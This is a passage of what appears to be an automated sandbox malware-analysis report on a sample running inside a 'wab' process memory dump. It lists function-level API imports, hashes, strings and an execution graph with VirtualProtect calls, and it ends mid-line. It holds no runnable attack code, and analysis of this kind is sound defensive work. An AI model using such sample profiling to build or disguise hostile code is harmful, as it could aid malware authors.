                                                                                                                                                                                                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                          • String ID: d=E
                                                                                                                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                                                                                                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1961120804-0
                                                                                                                                                                                                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                                                                                          Signature Coverage:0.5%
                                                                                                                                                                                                                          Total number of Nodes:843
                                                                                                                                                                                                                          Total number of Limit Nodes:16
                                                                                                                                                                                                                          execution_graph 34077 43ee43 59 API calls 34079 405e41 14 API calls 33890 429046 memset memset memcpy memset memset 33891 432447 17 API calls 33892 401445 memcpy memcpy DialogBoxParamA 33893 413848 strcmp 33894 41104f 16 API calls 33896 411a2d 14 API calls 34084 424852 76 API calls 33898 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34085 432654 15 API calls 33903 40b05a LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33906 401060 41 API calls 32986 410663 EnumResourceNamesA 33908 40b865 8 API calls 33909 427867 15 API calls 34088 425e13 87 API calls 33910 404469 22 API calls 34090 41466f 16 API calls 33913 425474 16 API calls 33914 426474 memcpy memset memset memcpy 34092 42e27a 61 API calls 34095 411201 RtlDeleteCriticalSection 33917 444003 __dllonexit 34099 404207 modf 33919 410808 memset SHGetPathFromIDList SendMessageA 33920 42a80b 27 API calls 33864 444a0f 33865 444a26 33864->33865 33868 444a94 33864->33868 33865->33868 33871 444a4e 33865->33871 33867 444a45 33867->33868 33869 444a75 VirtualProtect 33867->33869 33869->33868 33870 444a84 VirtualProtect 33869->33870 33870->33868 33872 444a53 33871->33872 33876 444a94 33872->33876 33878 444a6b 33872->33878 33874 444a5c 33875 444a75 VirtualProtect 33874->33875 33874->33876 33875->33876 33877 444a84 VirtualProtect 33875->33877 33877->33876 33879 444a71 33878->33879 33880 444a75 VirtualProtect 33879->33880 33882 444a94 33879->33882 33881 444a84 VirtualProtect 33880->33881 33880->33882 33881->33882 34101 40420c 12 API calls 34105 409213 10 API calls 33923 411014 15 API calls 34106 404217 26 API calls 34107 403a18 strlen WriteFile 33924 43f41d 17 API calls 33925 43f022 19 API calls 34110 408e21 7 API calls 34111 411222 RtlEnterCriticalSection 34114 43ee2d 112 API calls 34115 411231 RtlLeaveCriticalSection 34116 403632 21 API calls 34119 413e34 19 API calls 33934 427434 76 API calls 33935 423c3b 19 API calls 33939 405cc1 65 API calls 33941 424852 75 API calls 34121 4092cb 17 API calls 34122 4442cf _exit _c_exit 33945 43ecc8 18 API calls 34123 408ed5 7 API calls 34125 405edc SetDlgItemTextA GetDlgItemTextA 33950 424852 79 API calls 33951 424852 76 API calls 34126 427645 42 API calls 33954 4338e6 15 API calls 34128 43eae9 149 API calls 33956 4100ec 42 API calls 33958 426ced memset memset memcpy 34129 40c2ef 43 API calls 34130 40def0 9 API calls 34131 403af4 54 API calls 33963 43e8f9 122 API calls 34132 4016fc NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34133 4336fd 17 API calls 34134 403e83 34 API calls 34135 42968a 11 API calls 34136 40da89 42 API calls 33965 425e13 21 API calls 33967 43ec88 119 API calls 33968 426c8e 41 API calls 34137 433a8f 18 API calls 33970 409c8d _strcmpi 34139 44128b memcmp 34144 40aa94 7 API calls 34146 424852 111 API calls 34147 43f698 21 API calls 34152 4276ad 47 API calls 34153 423ab3 18 API calls 34155 43f2b7 17 API calls 33983 43f4ba 18 API calls 34156 424852 85 API calls 34157 4442bb _XcptFilter 33988 444941 ??3@YAXPAX 33990 424852 77 API calls 34158 43ef44 20 API calls 33991 42d14a 22 API calls 34159 404348 19 API calls 33992 40b94b 138 API calls 34161 424852 76 API calls 34162 40c750 59 API calls 33995 414557 memset memset 33996 42523b 79 API calls 33998 40ad58 30 API calls 34000 44315e 44 API calls 34001 41055b WritePrivateProfileStringA GetPrivateProfileStringA 34166 413f5c 18 API calls 34168 43f361 134 API calls 34005 440162 17 API calls 34006 444963 FreeLibrary 34007 429d69 memcpy 34169 40176b ExitProcess 34171 43eb6e 17 API calls 34009 437972 110 API calls 34010 405972 40 API calls 34173 442f71 _mbscpy 34012 403577 20 API calls 34015 44497b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34018 444905 _onexit __dllonexit 34019 43ed07 20 API calls 32987 410507 32990 4103e0 32987->32990 32989 410527 32991 4103ec 32990->32991 32992 4103fe GetPrivateProfileIntA 32990->32992 32995 4102f8 memset _itoa WritePrivateProfileStringA 32991->32995 32992->32989 32994 4103f9 32994->32989 32995->32994 34175 415b07 memcpy memcpy memcpy memcpy 34176 40af07 8 API calls 34022 414d0c 22 API calls 34023 433513 19 API calls 34180 424852 83 API calls 34027 40a117 memset sprintf SendMessageA 34181 40c319 125 API calls 34182 40b31a memset memset _mbsicmp 34029 410d1d 18 API calls 34186 441727 38 API calls 34031 433126 16 